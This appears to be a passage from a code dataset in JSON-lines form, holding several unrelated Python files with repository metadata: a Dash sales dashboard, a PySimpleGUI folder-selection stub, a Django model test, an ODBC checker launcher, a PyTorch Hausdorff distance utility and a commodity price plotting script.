\"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-weight\":\"1px\",\n \"border-color\":\"white\"\n },\n)\n\napp.layout = html.Div([\n dbc.Row([\n html.H3(\"Your Company Name\",\n style={\n \"font-size\":\"4vh\",\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"margin-top\":\"2vh\",\n \"margin-left\":\"20vw\",\n \"margin-bottom\":\"2vh\",\n }\n ),\n ],\n style={\n \"background-color\":\"#1C2026\",'box-shadow':'6px 6px 6px grey',\"width\":\"100vw\"\n }),\n dbc.Row([\n dbc.Col(\n dbc.Card(\n [\n html.Br(),\n html.H2(\n 'Swiss Sales Dashboard',\n style={\n 'font-size':'32px',\n 'font-family':\"'Paytone One'\",\n 'font-weight':'bold',\n \"margin-top\":\"6vh\",\n \"color\":\"#3C799D\"\n }\n ),\n pcard,\n html.Br(),\n dbc.Button(\n id=\"map\",\n children=[\n html.I(className=\"fa fa-map-pin\"),\n \" Sales Map\"\n ],\n color=\"rgba(0,0,0,0)\",\n style={\n \"color\":\"#3C799D\",\n \"height\":\"8vh\",\n \"font-size\":\"24px\",\n \"margin-top\":\"7vh\",\n 'font-family':\"'Paytone One'\"\n }\n ),\n dbc.Button(\n id=\"chart\",\n children=[\n html.I(className=\"fa fa-line-chart\"),\n \" Sales Statistics\"\n ],\n color=\"rgba(0,0,0,0)\",\n style={\n \"color\":\"#3C799D\",\n \"font-size\":\"24px\",\n \"height\":\"10vh\",\n 'font-family':\"'Paytone One'\"\n }\n ),\n # dbc.Button(id=\"report\",children=[html.I(className=\"fa fa-file-text\"),\" Generate Report\"], color=\"rgba(0,0,0,0)\",style={\"color\":\"#3C799D\", \"font-size\":\"24px\",\"height\":\"10vh\",'font-family':\"'Paytone One'\"}),\n # dbc.Button(id=\"report\",children=[\"Logout\"], 
color=\"rgba(0,0,0,0)\",style={\"color\":\"red\", \"font-size\":\"24px\",\"height\":\"10vh\",'font-family':\"'Paytone One'\", \"border\":\"3px\"}),\n dbc.Button(\n id=\"report\",\n children=[\"Logout\"],\n external_link=True,\n href=\"https://www.gwcustom.com/copy-of-home\",\n color=\"rgba(0,0,0,0)\",\n style={\n \"color\":\"red\",\n \"font-size\":\"24px\",\n \"height\":\"10vh\",\n 'font-family':\"'Paytone One'\",\n \"border\":\"3px\"\n }\n ),\n dbc.ButtonGroup(\n [dbc.Button([html.I(className=\"fa fa-linkedin-square\")],external_link=True, href=\"https://www.linkedin.com/in/griffin-#3C799D-3aa20918a/\",target=\"_blank\", color=\"rgba(0,0,0,0)\",style={\"color\":\"#3C799D\",\"font-size\":\"28px\"}),\n dbc.Button([html.I(className=\"fa fa-google\")],external_link=True, href=\"https://www.gwcustom.com/\",target=\"_blank\", color=\"rgba(0,0,0,0)\",style={\"color\":\"#3C799D\",\"font-size\":\"28px\"}),\n dbc.Button([html.I(className=\"fa fa-github\")],external_link=True, href=\"https://github.com/GriffinWhitePortfolio\",target=\"_blank\", color=\"rgba(0,0,0,0)\",style={\"color\":\"#3C799D\",\"font-size\":\"28px\"})],\n style={\"margin-left\":\"2vw\", \"margin-right\":\"2vw\", \"margin-top\":\"4vh\"}\n )\n # html.Shadow(dcc.RangeSlider(2000, 2022, 2, value=[2000, 2021], id='years'))\n\n ],style={\"height\":\"100vh\",'background-color':'#1F2732', 'box-shadow':'6px 6px 6px grey',\"position\":\"sticky\"}\n ),\n style={'textAlign': 'center'},\n width=3\n ),\n dbc.Col(\n id=\"main-out\",\n children=[\n dbc.Card([\n html.H1(\n [\n \"Swiss Sales Map \",\n html.I(className=\"fa fa-info-circle\")\n ],\n style={\n 'font-size':'26px',\n \"margin-left\":\"8vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n \"color\":\"#3C799D\"\n }\n )],\n style={\n \"margin-top\":\"8vh\",\n \"background-color\":\"rgba(0,0,0,0)\",\n 'font-family':\"'Paytone One'\",\n 'font-weight':'bold'\n }\n ),\n dbc.Card(\n id=\"main-graph\",\n children=[\n dcc.Graph(figure=fig,\n style={\n \"height\":\"75vh\",\n \"width\":\"70vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n 'box-shadow':'6px 6px 6px grey'\n }\n )\n ],\n style={\n \"background-color\":'rgba(0,0,0,0)',\n \"margin-top\":\"2vh\",\n \"margin-left\":\"2vw\",\n \"border-radius\":\"30px\"\n }\n )],\n width=9,\n style={}\n )\n ])\n# ],style={'background-image':'url(/assets/bg.jpg)','height':'100vh', 'width':'100vw'})\n],style={'background-color':'#2B323D','height':'110vh', 'width':'100vw'})\n\n\n\n@app.callback(\n Output(\"main-out\",\"children\"),\n [Input(\"map\",\"n_clicks\"),\n Input(\"chart\",\"n_clicks\"),\n Input(\"report\",\"n_clicks\"),\n Input(\"main-out\",\"children\")])\ndef main_out(map, chart, report, current):\n\n trigger = callback_context.triggered[0]['prop_id']\n print(trigger)\n\n if trigger == \"map.n_clicks\":\n send = [\n dbc.Card(\n [html.H1([\n \"Swiss Sales Map \",\n html.I(className=\"fa fa-info-circle\")],\n style={\n 'font-size':'26px',\n \"margin-left\":\"8vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n \"color\":\"#3C799D\"\n }\n )],\n style={\n \"margin-top\":\"8vh\",\n \"background-color\":\"rgba(0,0,0,0)\",\n 'font-family':\"'Paytone One'\",\n 'font-weight':'bold'\n }\n ),\n dbc.Card(\n id=\"main-graph\",\n children=[\n dcc.Graph(figure=fig,\n style={\n \"height\":\"75vh\",\n \"width\":\"70vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n 'box-shadow':'6px 6px 6px grey'\n }\n )\n ],\n style={\n \"background-color\":'rgba(0,0,0,0)',\n \"margin-top\":\"2vh\",\n \"margin-left\":\"2vw\",\n \"border-radius\":\"30px\"\n }\n )]\n elif trigger == \"chart.n_clicks\":\n send = [\n 
dbc.Card(\n [\n html.H1(\n [\n \"Swiss Sales Statistics \",\n html.I(className=\"fa fa-info-circle\")\n ],\n style={\n 'font-size':'26px',\n \"margin-left\":\"8vw\",\n \"bg-color\":\"rgba(0,0,0,0)\",\n \"color\":\"#3C799D\"\n }\n )\n ],\n style={\n \"margin-top\":\"8vh\",\n \"background-color\":\"rgba(0,0,0,0)\",\n 'font-family':\"'Paytone One'\",\n 'font-weight':'bold'\n }\n ),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n dcc.Graph(\n figure=pie\n )],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"height\":\"36vh\"\n }\n )\n ], width=4),\n dbc.Col([\n dbc.Card([\n dbc.Row([\n dbc.Col([\n daq.Gauge(\n color={\"gradient\":True,\"ranges\":{\"red\":[0,0.6],\"yellow\":[0.6,0.8],\"green\":[0.8,1]}},\n value=0.6,\n label={'label':'Sales to Inventory Ratio','style':{\"font-size\":\"22px\",\"margin-top\":\"1vh\"}},\n max=1,\n min=0,\n )\n ],\n width=9),\n dbc.Col([\n html.H1(\"0.6\",\n style={\n \"color\":\"yellow\",\n \"font-size\":\"32px\",\n \"margin-top\":\"10vh\"\n }\n )\n ],\n width=3)\n ])\n ],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"height\":\"36vh\"\n }\n )], width=4),\n dbc.Col([\n dbc.Card([\n dbc.Row([\n dbc.Col([\n daq.Gauge(\n color={\"gradient\":True,\"ranges\":{\"red\":[0,0.6],\"yellow\":[0.6,0.8],\"green\":[0.8,1]}},\n value=0.864,\n label={'label':'Industry Percentile','style':{\"font-size\":\"22px\",\"margin-top\":\"1vh\"}},\n max=1,\n min=0,\n )\n ],width=9),\n dbc.Col([\n html.H1(\"0.86\",\n style={\n \"color\":\"green\",\n \"font-size\":\"32px\",\n \"margin-top\":\"10vh\"\n }\n )\n ],\n width=3)\n ])\n ],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"height\":\"36vh\"\n }\n )],\n width=4\n ),],\n style={\n \"margin-right\":\"4vw\",\n \"margin-left\":\"4vw\",\n \"margin-top\":\"6vh\"\n }\n ),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n dcc.Graph(\n figure=fig3\n )],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"margin-top\":\"3vh\"\n }\n )], width=5\n ),\n dbc.Col([\n dbc.Card([\n dcc.Graph(\n figure=fig4\n )],\n style={\n 'box-shadow':'6px 6px 6px grey',\n 'background-color':'#1C2026',\n \"font-family\":\"'Paytone One'\",\n \"color\":\"#3C799D\",\n \"border-radius\":\"20px\",\n \"margin-top\":\"3vh\"\n }\n )\n ],width=7)\n ],\n style={\n \"margin-bottom\":\"20vh\",\n \"margin-right\":\"4vw\",\n \"margin-left\":\"4vw\",\n \"margin-top\":\"3vh\"\n }\n )]\n # elif trigger == \"report.n_clicks\":\n # # send = [dbc.Card([html.H1([\"Swiss Sales Report Generation \", html.I(className=\"fa fa-info-circle\")], style={'font-size':'26px',\"margin-left\":\"8vw\", \"bg-color\":\"rgba(0,0,0,0)\"})],style={\"margin-top\":\"8vh\", \"background-color\":\"rgba(0,0,0,0)\",'font-family':\"'Paytone One'\", 'font-weight':'bold', \"border-radius\":\"20px\"}),]\n # #3C799D\n else:\n send = current\n\n return send\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n", "repo_name": "grawfin/SwissSales", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 20833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", 
"api": [{"api_name": "chart_studio.tools.set_credentials_file", "line_number": 13, "usage_type": "call"}, {"api_name": "chart_studio.tools", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 31, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 31, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 32, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 32, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 33, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 33, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 55, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 55, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Bar", "line_number": 85, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 85, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Pie", "line_number": 116, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 116, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 136, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 136, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scattermapbox", "line_number": 139, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 139, "usage_type": "name"}, {"api_name": "plotly.graph_objects.scattermapbox.Marker", "line_number": 144, "usage_type": "call"}, {"api_name": "plotly.graph_objects.scattermapbox", "line_number": 144, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 144, "usage_type": "name"}, {"api_name": "plotly.graph_objects.layout.Mapbox", "line_number": 154, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 154, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 154, "usage_type": "name"}, {"api_name": "plotly.graph_objects.layout.mapbox.Center", "line_number": 158, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 158, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 158, "usage_type": "name"}, {"api_name": "dash.Dash", "line_number": 174, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.themes", "line_number": 176, "usage_type": "attribute"}, {"api_name": "dash_bootstrap_components.icons", "line_number": 177, "usage_type": "attribute"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 183, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 185, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 187, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardImg", "line_number": 188, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 195, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 196, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 198, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 199, "usage_type": "call"}, {"api_name": "dash_html_components.Small", "line_number": 206, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 232, "usage_type": "call"}, 
{"api_name": "dash_bootstrap_components.Row", "line_number": 233, "usage_type": "call"}, {"api_name": "dash_html_components.H3", "line_number": 234, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 248, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 249, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 250, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 252, "usage_type": "call"}, {"api_name": "dash_html_components.H2", "line_number": 253, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 264, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 265, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 268, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 280, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 283, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 296, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.ButtonGroup", "line_number": 310, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 311, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 311, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 312, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 312, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 313, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 313, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 323, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 326, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 327, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 330, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 346, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 349, "usage_type": "call"}, {"api_name": "dash.callback_context.triggered", "line_number": 382, "usage_type": "attribute"}, {"api_name": "dash.callback_context", "line_number": 382, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 387, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 388, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 390, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 405, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 408, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 426, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 428, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 431, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 448, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 449, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 450, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 451, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 464, 
"usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 465, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 466, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 467, "usage_type": "call"}, {"api_name": "dash_daq.Gauge", "line_number": 468, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 477, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 478, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 498, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 499, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 500, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 501, "usage_type": "call"}, {"api_name": "dash_daq.Gauge", "line_number": 502, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 510, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 511, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 539, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 540, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 541, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 542, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 555, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 556, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 557, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 375, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 376, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 377, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 378, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 379, "usage_type": "call"}]}
+{"seq_id": "22023493960", "text": "import PySimpleGUI as sg\n\n# Custom theme for a more appealing GUI\nsg.theme('DarkAmber')\n\n# Event handler for the \"Select All\" button\ndef select_all():\n for i in range(10):\n window[f'checkbox_{i}'].update(True)\n\n# Event handler for the \"Deselect All\" button\ndef deselect_all():\n for i in range(10):\n window[f'checkbox_{i}'].update(False)\n\n# Define the layout of the GUI\nlayout = [\n [sg.Text(\"Folder 1: \"), sg.Input(key='folder_path_1'), sg.FolderBrowse(button_text='Fetch Folder 1', key='button_1')],\n [sg.Text(\"Folder 2: \"), sg.Input(key='folder_path_2'), sg.FolderBrowse(button_text='Fetch Folder 2', key='button_2')],\n [sg.Button('Select All'), sg.Button('Deselect All')],\n [sg.Text('Fruits:', font='Helvetica 12 bold')]\n]\n\nfruits = ['apple', 'banana']\n\n# Add fruit labels with icons to the layout\nfor i, fruit in enumerate(fruits):\n icon = f'{fruit}.png' # Assuming you have fruit icons in a folder named \"icons\"\n full_size_icon = sg.Image(icon, size=(64, 64))\n layout.append([sg.Image(icon, size=(32, 32), tooltip=full_size_icon), sg.Text(fruit, key=f'fruit_{i}', font='Helvetica 12'), sg.Checkbox('', key=f'checkbox_{i}')])\n\nlayout.append([sg.Button('Submit', size=(10, 1), font='Helvetica 12')])\n\n# Create the GUI window with title\nwindow = sg.Window('Android Forensics', layout)\n\n# Event loop to process events and get the values from the GUI elements\nwhile True:\n event, values = window.read()\n\n if event == sg.WINDOW_CLOSED:\n break\n elif event == 'button_1':\n folder_path = sg.popup_get_folder(\"Select a folder\")\n if folder_path:\n window['folder_path_1'].update(folder_path)\n elif event == 'button_2':\n folder_path = sg.popup_get_folder(\"Select a folder\")\n if folder_path:\n window['folder_path_2'].update(folder_path)\n elif event == 'Select All':\n select_all()\n elif event == 'Deselect All':\n deselect_all()\n elif event == 'Submit':\n folder_path_1 = values['folder_path_1']\n folder_path_2 = values['folder_path_2']\n selected_fruits = [fruits[i] for i in range(10) if values[f'checkbox_{i}']]\n sg.popup(f\"Folder 1: {folder_path_1}\\nFolder 2: {folder_path_2}\\nSelected Fruits: {selected_fruits}\")\n\n# Close the GUI window\nwindow.close()\n", "repo_name": "vdmondkr2002/AndroDetective", "sub_path": "temp.py", "file_name": "temp.py", "file_ext": "py", "file_size_in_byte": 2305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PySimpleGUI.theme", "line_number": 4, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 18, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 18, "usage_type": "call"}, {"api_name": "PySimpleGUI.FolderBrowse", "line_number": 18, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 19, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 19, "usage_type": "call"}, {"api_name": "PySimpleGUI.FolderBrowse", "line_number": 19, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 20, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 21, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 29, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 30, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 30, "usage_type": "call"}, {"api_name": "PySimpleGUI.Checkbox", "line_number": 30, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", 
"line_number": 32, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 35, "usage_type": "call"}, {"api_name": "PySimpleGUI.WINDOW_CLOSED", "line_number": 41, "usage_type": "attribute"}, {"api_name": "PySimpleGUI.popup_get_folder", "line_number": 44, "usage_type": "call"}, {"api_name": "PySimpleGUI.popup_get_folder", "line_number": 48, "usage_type": "call"}, {"api_name": "PySimpleGUI.popup", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "16288198755", "text": "from django.test import TestCase\n\n# Create your tests here.\n\nfrom .models import *\nfrom django.utils import timezone\n\n\nclass ModelTestCase(TestCase):\n def setUp(self):\n q = Question.objects.create(\n question_text=\"To be or not to be, THAT is the question.\",\n pub_date=timezone.now(),\n )\n Choice.objects.create(question=q, choice_text=\"To be\")\n\n def test_question(self):\n q = Question.objects.get(\n question_text=\"To be or not to be, THAT is the question.\"\n )\n self.assertEqual(q.was_published_recently(), True)\n", "repo_name": "EdenWuyifan/swe1-app", "sub_path": "mysite/polls/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.test.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 13, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 13, "usage_type": "name"}]}
+{"seq_id": "14498891457", "text": "import argparse\nimport sys\n\nfrom tester import ODBCTester\n\nif __name__ == '__main__':\n desc = \"Usa el comando -p para indicar la ruta a un archivo .mdb (Microsoft Access Database) para comprobar \" \\\n \"que se puede leer/usar odbc. En caso contrario lanzara una excepcion de lo que ha ocurrido.\\n\"\n\n parser = argparse.ArgumentParser(description='Comprueba que exista odbc valido instalado.',\n epilog=desc)\n parser.add_argument('-p', '--path', help='Ruta a archivo .mdb', required=True)\n args = vars(parser.parse_args(None if sys.argv[1:] else ['-h']))\n\n if args['path']:\n tester = ODBCTester(args['path'])\n tester.run()\n else:\n print(\"Falta ruta de archivo .mdb\")\n", "repo_name": "Nestorm18/odbcTester", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tester.ODBCTester", "line_number": 16, "usage_type": "call"}, {"api_name": "tester.run", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "36026649464", "text": "\"\"\"\nModified Hausdorff distance computation based on code from the omniglot repository:\nhttps://github.com/brendenlake/omniglot/tree/master/python/one-shot-classification\n\"\"\"\n\nimport torch\n\n\ndef mod_hausdorff_distance(item1: torch.Tensor, item2: torch.Tensor) -> torch.Tensor:\n\t\"\"\"\n\tModified Hausdorff Distance\n\n\tM.-P. Dubuisson, A. K. Jain (1994). A modified hausdorff distance for object matching.\n\tInternational Conference on Pattern Recognition, pp. 566-568.\n\n\tArgs:\n\t\titem1: [n, 2] coordinates of \"inked\" pixels\n\t\titem2: [m, 2] coordinates of \"inked\" pixels\n\n\tReturns:\n\t\tcomputed distance\n\n\t\"\"\"\n\td = torch.cdist(item1, item2)\n\tmindist_1, _ = d.min(axis=1)\n\tmindist_2, _ = d.min(axis=0)\n\tmean_1 = torch.mean(mindist_1, dim=0)\n\tmean_2 = torch.mean(mindist_2, dim=0)\n\n\treturn torch.maximum(mean_1, mean_2)\n\n\ndef binary_image_to_points(img: torch.Tensor, invert=False) -> torch.Tensor:\n\t\"\"\"\n\tConvert (~binary) image tensor to a list of mean-centred coordinates of the non-zero pixels.\n\n\tArgs:\n\t\timg: [1, H, W] the image tensor\n\t\tinvert: if true the input image will be inverted (e.g. when strokes are assumed to be zero and background one)\n\n\tReturns:\n\t\tthe mean-centred coordinates\n\n\t\"\"\"\n\n\tif invert:\n\t\timg = torch.logical_not(img.squeeze(0))\n\telse:\n\t\timg = img.squeeze(0)\n\n\tcoords = torch.nonzero(img).float()\n\tcoords = coords - coords.mean(dim=0)\n\n\treturn coords\n", "repo_name": "jonhare/DifferentiableSketching", "sub_path": "dsketch/utils/mod_haussdorff.py", "file_name": "mod_haussdorff.py", "file_ext": "py", "file_size_in_byte": 1366, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 127, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.Tensor", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.cdist", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.maximum", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.logical_not", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nonzero", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "2516633466", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 16:40:57 2018\n\n@author: LFVARGAS\n\"\" \n\nThis a simple report script for visualize all the crops commodities join in one graphic all the \ninstutions that sell this product, then two study how is the general behavior of each crop\n\nthe results were tree pdf reports CommoditiesTS_.pdf\nCrops are ordered by the number of records, descending so you will see the most populated in the first plot\n\"\"\"\n\nimport os,sys\nsys.path.append('../Factory')# commodity folder \n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nfrom Commodity import Commodity\n\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n\n#Constans\nos.chdir(\"../\")#AFFECT ALL THE EXETCUTION\n\nRELATIVE_PATH=\"./data/Cleaned/\"\n\nFILE_NAME= RELATIVE_PATH+\"Monthly_data_cmo_step2\"\nFILE_FORMAT=\".csv\"\nGrouperColumns=[\"CommodityId\"]\n\nDF_Month= pd.read_csv(\"./%s%s\"%(FILE_NAME,FILE_FORMAT))\nDF_Month[\"date\"]=pd.to_datetime(DF_Month[\"date\"], format='%Y-%m-%d')\n\n#DF_Month=DF_Month[DF_Month[\"CommodityId\"]==26]\n#DF_Month=DF_Month[DF_Month[\"APMC\"]==\"Barshi\"]\n\n\ncommodityManager=Commodity()\n\n\n\n\n\ndef viewPlotsTS(DataFrame_View,myColumnValue):\n by_group = DataFrame_View.groupby(GrouperColumns)\n \n by_group=sorted(by_group, # iterates pairs of (key, corresponding subDataFrame)\n key=lambda x: len(x[1]), # sort by number of rows (len of subDataFrame)\n reverse=True) # reverse the sort i.e. largest first\n \n i=0\n MAX_I=99999\n \n pdf= PdfPages('./Reports/CommoditiesTS_%s.pdf'%(myColumnValue))\n \n for name, group in by_group:\n \n group=group.sort_values(\"date\")\n \n \n fig, ax = plt.subplots(figsize=(20, 8))\n \n realName= commodityManager.getNameById(name)\n plt.title(str(name)+\"-\"+realName+\"-TS Plot\")\n #for this comodity which is the APMC associated\n apmcs=group[\"APMC\"].unique()[:15]\n \n for index,item in enumerate(apmcs):\n groupFiltered=group[group[\"APMC\"]==item]\n groupFiltered=groupFiltered.sort_values(\"date\")\n plt.plot(groupFiltered[\"date\"], groupFiltered[myColumnValue], label=item) \n \n ax.legend(loc='best')\n \n \n pdf.savefig() # saves the current figure into a pdf page\n \n \n i=i+1\n \n if(i==MAX_I):\n break\n \n pdf.close()\n #plt.show()\n\n\nviewPlotsTS(DF_Month,\"min_price\")\nviewPlotsTS(DF_Month,\"max_price\")\nviewPlotsTS(DF_Month,\"modal_price\")", "repo_name": "felipe-vargas-inrae/CropCommodityChallenge", "sub_path": "PreprocessingExploration/PlotByCommodity.py", "file_name": "PlotByCommodity.py", "file_ext": "py", "file_size_in_byte": 2531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 